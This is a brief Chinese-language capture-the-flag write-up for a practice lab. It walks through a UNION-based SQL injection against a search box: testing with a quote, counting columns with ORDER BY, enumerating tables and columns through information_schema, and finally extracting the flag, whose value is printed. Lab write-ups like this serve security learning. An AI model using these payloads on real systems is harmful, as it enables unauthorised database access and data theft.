URL:http://47.103.94.191:8002/search.php
进入靶场后出现此界面,在登录界面用户名输入1’,密码任意判断一下是数字型还是字符型,页面异常。再次输入1’ and 1=1 #,看看有没有注入点,页面异常。也尝试了其他手工注入的方法,仍然异常。
在界面中还有一搜索留言,我们在搜索框中发现注入点
一、判断是否有注入点
搜索框内 输入a正常回显
输入a'报错
二、 猜解列名数量(字段数)
a' order by 1 #
6页面显示不正常,发现最大正常位是5
三、查看报错位(1,2,3,4,报错)
a' union select 1,2,3,4,5 #
四、获取数据库信息
获取数据库名称(dwvs)
数据库表的信息
(account,caffaine,dwvs_admin_message,dwvs_message,dwvs_user_message,dwvs_vulnerability,flag,news,user)
a' union select 1,2,database(),group_concat(table_name),5 from information_schema.tables where table_schema=database() #
查找flag表下的列
数据库列的信息:id,flag
a' union select 1,2,database(),group_concat(column_name),5 from information_schema.columns where table_name='flag' #
获取flag
a' union select 1,2,database(),flag,5 from dwvs.flag #
提交flag
flag{8bce2844bc098845261fad79a3a56215}